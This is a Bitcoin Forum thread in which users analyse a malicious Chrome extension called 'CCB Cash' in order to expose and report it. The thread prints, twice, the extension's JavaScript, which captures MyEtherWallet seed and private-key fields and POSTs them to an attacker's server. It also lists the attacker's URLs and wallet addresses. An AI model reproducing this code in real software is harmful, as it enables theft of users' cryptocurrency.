Bitcoin Forum
December 12, 2024, 07:38:52 AM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: We need some help to decode a hacker addon  (Read 602 times)
seoincorporation (OP)
Legendary
*
Offline Offline

Activity: 3374
Merit: 3130



View Profile
December 12, 2018, 02:45:03 PM
Merited by OmegaStarScream (2), LoyceV (1), BitMaxz (1), VB1001 (1)
 #1

A lot of users on the forum are getting scammed this way as you can see on the next links:

https://bitcointalk.org/index.php?topic=5083404.0
https://bitcointalk.org/index.php?topic=5083139.0
https://bitcointalk.org/index.php?topic=5081286.0


So, the add-on has been taken down and they upload it with another name, now is called CCB Cash.

https://chrome.google.com/webstore/detail/%D1%81cb-cash/liachincjagnalnmahhaioaogkngbmhf?hl=en-US&gl=MX

So, there is an extension to view source code from any addon, it's called 'Chrome extension source viewer'

When i take a look to this code i realized how bad it is...

Code:
    "name": "CCB Cash",
    "permissions": [
        "activeTab",
        "tabs",
        "cookies",
        "*://github.com/*",
        "*://api.github.com/*",
        "*://exmo.me/*",
        "*://*.twitter.com/*",
        "*://*.coinbase.com/*",
        "*://qq.com/*",
        "*://*.hbg.com/*",
        "*://hitbtc.com/*",
        "*://twitter.com/*",
        "*://*.binance.com/*",
        "*://*.localbitcoins.com/*",
        "*://localbitcoins.com/*",
        "*://blockchain.com/*",
        "*://*.exmo.com/*",
        "*://cryptodraw.org/*",
        "*://exmo.com/*",
        "*://*.live.com/*",
        "*://bitfinex.com/*",
        "*://hbg.com/*",
        "*://*.yahoo.com/*",
        "*://google.com/*",
        "*://*.bitfinex.com/*",
        "*://*.hitbtc.com/*",
        "*://coinbase.com/*",
        "*://*.huobi.com/*",
        "*://*.google.com/*",
        "*://*.exmo.me/*",
        "*://huobi.com/*",
        "*://yahoo.com/*",
        "*://*.blockchain.com/*",
        "*://myetherwallet.com/*",
        "*://binance.com/*",
        "*://*.myetherwallet.com/*",
        "*://live.com/*",
        "*://*.qq.com/*"
    ],

So, this time i ask for some help, maybe the developers can find some useful information about this APP to stop this hacker.

By the way, you don't have to install the addon to see the source.

▄▄███████▄▄
▄██████████████▄
▄██████████████████▄
▄████▀▀▀▀███▀▀▀▀█████▄
▄█████████████▄█▀████▄
███████████▄███████████
██████████▄█▀███████████
██████████▀████████████
▀█████▄█▀█████████████▀
▀████▄▄▄▄███▄▄▄▄████▀
▀██████████████████▀
▀███████████████▀
▀▀███████▀▀
.
 MΞTAWIN  THE FIRST WEB3 CASINO   
.
.. PLAY NOW ..
nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
December 13, 2018, 08:52:22 AM
Last edit: December 13, 2018, 09:17:33 AM by nuno12345
Merited by theymos_away (20), LoyceV (3), seoincorporation (3), DdmrDdmr (2), marlboroza (2), vapourminer (1), ABCbits (1), Piggy (1), Bitcoinnation (1)
 #2

Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
 if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c
buwaytress
Legendary
*
Offline Offline

Activity: 3024
Merit: 3727


Join the world-leading crypto sportsbook NOW!


View Profile
December 13, 2018, 09:20:26 AM
 #3

@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.

██
██
██
██
██
██
██
██
██
██
██
██
██
... LIVECASINO.io    Play Live Games with up to 20% cashback!...██
██
██
██
██
██
██
██
██
██
██
██
██
nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
December 13, 2018, 09:37:34 AM
 #4

I understand.

What if someone makes an extension to block this type of behaviour?

Requests could be blocked to certain urls, cors enforced, etc.

By having an external list, say being grabbed from github it could be updated much quicker than relying on google or registrars to take down extensions/domains
jjjfff
Copper Member
Member
**
Offline Offline

Activity: 182
Merit: 18

Crypto.BI


View Profile
December 13, 2018, 09:40:05 AM
Merited by theymos_away (2)
 #5

Note that no URL has ever been captured for help-tools.org



Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255


Emails sent to pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org should reach the malware author though.

KingZee
Sr. Member
****
Offline Offline

Activity: 952
Merit: 452


Check your coin privilege


View Profile
December 13, 2018, 11:18:21 AM
 #6


Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:


I was just going to say that, it's a 404 on the main page, fresh domain, hacked my ass.

I can't think of any way to prevent this from happening to your typical user. If someone thinks that it's possible for an addon, to monitor other downloaded addons, before they're installed, to check for patterns, then it might be possible to make a quick solution to prevent this in the future.

You should all remember that the perpetrator is constantly promoting his scam here using newbie accounts, and probably reads all of this, so hello scammer, we're trying to stop you Cheesy

Beep boop beep boop
seoincorporation (OP)
Legendary
*
Offline Offline

Activity: 3374
Merit: 3130



View Profile
December 13, 2018, 01:54:00 PM
 #7

Had a quick look.

How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
 if (location.href.indexOf('myetherwallet') > -1) {
     function kurilkaNJSmo() {
         document.onkeyup = function(e) {
             e = e || window.event;
             if (e.keyCode === 13) {
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
             return !1
         }
         document.body.addEventListener("click", function(event) {
             if (event.toElement.className == "btn btn-primary ng-scope") {
                 console.log("go");
                 var seeddas = $("#aria4").val();
                 var pkk = $("#aria6").val();
                 var myseedwal = seeddas + ' + ' + pkk;
                 $.ajax({
                     type: 'POST',
                     url: 'https://help-tools.org/courses/currentc.php',
                     crossDomain: !0,
                     data: {
                         meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                     },
                     dataType: 'html',
                 })
             }
         })
     }
     setTimeout(kurilkaNJSmo, 2000)
 }


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume.


EDIT:
Addresses of the thief:
Code:
         CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
         CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
         CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
         CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
         CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google translate autodetects russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c

Thanks nuno12345 that's some great information, was the kind of info i was searching for. I leave you some merits.  Cheesy

▄▄███████▄▄
▄██████████████▄
▄██████████████████▄
▄████▀▀▀▀███▀▀▀▀█████▄
▄█████████████▄█▀████▄
███████████▄███████████
██████████▄█▀███████████
██████████▀████████████
▀█████▄█▀█████████████▀
▀████▄▄▄▄███▄▄▄▄████▀
▀██████████████████▀
▀███████████████▀
▀▀███████▀▀
.
 MΞTAWIN  THE FIRST WEB3 CASINO   
.
.. PLAY NOW ..
mistercoin
Legendary
*
Offline Offline

Activity: 1057
Merit: 1000


Rent Me!


View Profile WWW
December 14, 2018, 05:07:21 PM
 #8

@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.

For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.

Sadly, I too believe this is the case. It will take a massive loss for the news to pick it up and spread the facts to the rest of the chrome users. I'm going to take a look at the source code and see if I can find any connections between the domains, addresses and people. I'll let you all know what I find. If only Google were as vigilant with their browser add-ons as they were with their YouTube platform takedown algorithms, our jobs would be a lot easier.. *sigh*

-MisterCoin

Share Your Network, Get Crypto. It's That simple. |✔ Use this link to get a $5 bonus[/url] ✔|
Piggy
Hero Member
*****
Offline Offline

Activity: 784
Merit: 1416



View Profile WWW
December 16, 2018, 07:10:52 AM
Merited by LoyceV (1)
 #9

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..
xBoxLive
Member
**
Offline Offline

Activity: 266
Merit: 25


View Profile
December 16, 2018, 04:17:28 PM
 #10

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?
Piggy
Hero Member
*****
Offline Offline

Activity: 784
Merit: 1416



View Profile WWW
December 16, 2018, 08:03:16 PM
 #11

It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?

I don't think they are going to be in any hurry to do that indeed. When you install the extension they are telling you the equivalent of "do it at your own risk". I guess they would act a bit faster just if they would start to lose money  Roll Eyes
seoincorporation (OP)
Legendary
*
Offline Offline

Activity: 3374
Merit: 3130



View Profile
December 16, 2018, 09:14:56 PM
 #12

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Agree and it's sad, google and firefox should worry a little more for the customers, i know they are big platforms and should be hard for them to review their apps one by one, but c'mon we are almost in 2019 and that job could be done by artificial neural networks. A simple grep to verify if the app is hacking information from the main sites like google, outlook, or some social networks.

Is intolerable the fact that anyone can make this kind of apps and publish them as if there were no law.

▄▄███████▄▄
▄██████████████▄
▄██████████████████▄
▄████▀▀▀▀███▀▀▀▀█████▄
▄█████████████▄█▀████▄
███████████▄███████████
██████████▄█▀███████████
██████████▀████████████
▀█████▄█▀█████████████▀
▀████▄▄▄▄███▄▄▄▄████▀
▀██████████████████▀
▀███████████████▀
▀▀███████▀▀
.
 MΞTAWIN  THE FIRST WEB3 CASINO   
.
.. PLAY NOW ..
bob123
Legendary
*
Offline Offline

Activity: 1624
Merit: 2482



View Profile WWW
December 20, 2018, 09:38:45 AM
Merited by LoyceV (3), hatshepsut93 (1)
 #13

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users.

It depends on how you define safer.


A web browser extension can:
  • access all sites you visit
  • read / modify each information you enter on any website (e.g. usernames / passwords)
  • steal your cookies (which are a form of authentication)

However, a browser extension can NOT:
  • search through your file system
  • download any additional malware (add-ons are run within an isolated environment)
  • access your system at all
  • do anything non-browser-related
  • compromise your system

Running an executable on your system can do anything the user also is able to do (or even more if a privilege escalation is being abused).

KingZee
Sr. Member
****
Offline Offline

Activity: 952
Merit: 452


Check your coin privilege


View Profile
December 20, 2018, 11:37:11 AM
Merited by vapourminer (1)
 #14

...

I'm not sure honestly. I know for a fact browser extensions can access the file system purely from my experience with past extensions. I spent about 30 minutes skimming google and their developer docs. If this is wrong on my end please let me know :

  • download any additional malware (add-ons are run within an isolated environment) : Downloading malware means the application needs permission to connect to its server, and needs write permission on the target machine. Examples of extensions with write permission : 3rd party session saving that restore your tabs, and any application that needs to store its state on your computer.
  • search through your file system : This means read permission. An extension that comes to mind is download managers and extensions that communicate with other applications.

So, API examples :

https://developer.chrome.com/apps/fileSystem : File System endpoint. After reading through this it looks like you can access absolute paths on the target machine.
https://developer.chrome.com/apps/storage : Storage endpoint. Note that this is a lot different because you can only access your own directory in AppData.
https://developer.chrome.com/extensions/nativeMessaging : Native messaging. Even though after reading through it, it looke like that it might be only possible for the app to send messages to other apps that they programmed themselves.

But even without mentioning all of these, just purely including complete browser access is a massive security risk. Especially for people who use web wallets. Like bob said the extension can run any arbitrary code on any webpage, access any session-related data, display/modify any forms.. Basically a complete takeover over your browser experience.

Beep boop beep boop
Initscri
Hero Member
*****
Offline Offline

Activity: 1582
Merit: 759


View Profile WWW
December 22, 2018, 01:10:44 AM
 #15

Note that no URL has ever been captured for help-tools.org



Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:

Domain Name: HELP-TOOLS.ORG
Registry Domain ID: D402200000008508823-LROR
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: www.namesilo.com
Updated Date: 2018-12-06T08:04:10Z
Creation Date: 2018-12-02T06:52:52Z

The domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate.

As expected the specific whois is anonymized:

Registrant Email: pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255


Emails sent to pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org should reach the malware author though.

Did you include a pixel tracker in that? If they open the email and their email service provider doesn't block it, you'll get their IP address which may be useful to connect/identify the user.

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Quite the contrary, it's actually far easier to build & market a chrome extension (or FF) when compared to system level executable.

Let's face it, any script kiddie can basically build one with junior-level knowledge of Javascript.

If Google isn't checking the source, virtually no plugin/extension is 100% safe. I wouldn't be surprised if non-bitcoin related chrome extensions are built just waiting to pickup on Bitcoin related traffic.

----------------------------------
Web Developer. PM for details.
----------------------------------
ranman09
Full Member
***
Offline Offline

Activity: 756
Merit: 112


View Profile
December 22, 2018, 02:17:52 AM
 #16

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?
Initscri
Hero Member
*****
Offline Offline

Activity: 1582
Merit: 759


View Profile WWW
December 23, 2018, 06:50:42 AM
 #17

Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google  Roll Eyes

How is the situation for Firefox extensions?

I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..

Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?

AFAIK, google releases the extensions onto the market without them being 100% verified first. There's just simply way too many extensions being uploaded, they wouldn't be able to manually approve each one.

They employ individuals to respond to reports, and perform spot checks (and I'm sure they have automated systems to catch most things/conventional attacks); but at the end of the day it's primarily up to the user to verify.

----------------------------------
Web Developer. PM for details.
----------------------------------
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!